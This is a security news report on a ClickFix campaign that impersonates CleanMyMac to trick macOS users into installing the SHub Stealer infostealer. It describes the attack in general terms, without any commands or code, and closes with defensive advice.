Security researchers at Malwarebytes have identified a malware campaign targeting macOS users through a fraudulent website that impersonates the popular CleanMyMac system utility. The operation distributes an information-stealing malware designed to collect passwords, cryptocurrency wallet data, and other sensitive information from infected devices.
The malicious campaign relies on a fake website that closely imitates the legitimate CleanMyMac product page. CleanMyMac is a macOS maintenance and optimization tool developed by MacPaw and used by millions of Mac users to manage storage and system performance. The attackers’ site presents itself as a download portal for the software, but is not connected to MacPaw or the official CleanMyMac application.
According to security researchers, the fake page directs visitors to a domain designed to resemble the legitimate site. Victims are instructed to open the Terminal application on their Mac and paste a command provided on the page. Executing the command downloads and installs malware directly from an attacker-controlled server.
The technique used in the attack is known as “ClickFix,” a social engineering method that persuades users to run malicious commands themselves. Because the command is executed voluntarily by the user, many of macOS’s built-in protections, such as Gatekeeper, notarization checks, and XProtect, do not block the installation.
Once executed, the command installs SHub Stealer, a macOS information-stealing malware. The malware is designed to collect sensitive data from the compromised system, including browser data, saved passwords, Apple Keychain information, cryptocurrency wallet files, and messaging platform sessions such as Telegram.
Researchers also observed that the malware attempts to modify certain cryptocurrency wallet applications so attackers can later access recovery phrases or other authentication information. Wallet applications potentially targeted include Exodus, Atomic Wallet, and Ledger-related software.
The attack sequence begins with a small loader script that prepares the system before the full payload is delivered. In some cases, the script checks system settings to determine the device’s location or language configuration before continuing with the infection process.
After installation, the malware can remain on the system and continue communicating with attacker controlled infrastructure. In addition to stealing data, researchers say the malware can leave a persistent backdoor that allows attackers to maintain access even after initial data collection has occurred.
The campaign highlights how attackers increasingly rely on social engineering instead of exploiting technical vulnerabilities. By convincing victims to run commands manually, the malware bypasses many of the automated defenses designed to protect macOS systems.
Security researchers recommend downloading software only from official developer websites or trusted app stores. They also advise users to treat any website that instructs them to paste commands into the Terminal as suspicious, since legitimate applications rarely require this installation method.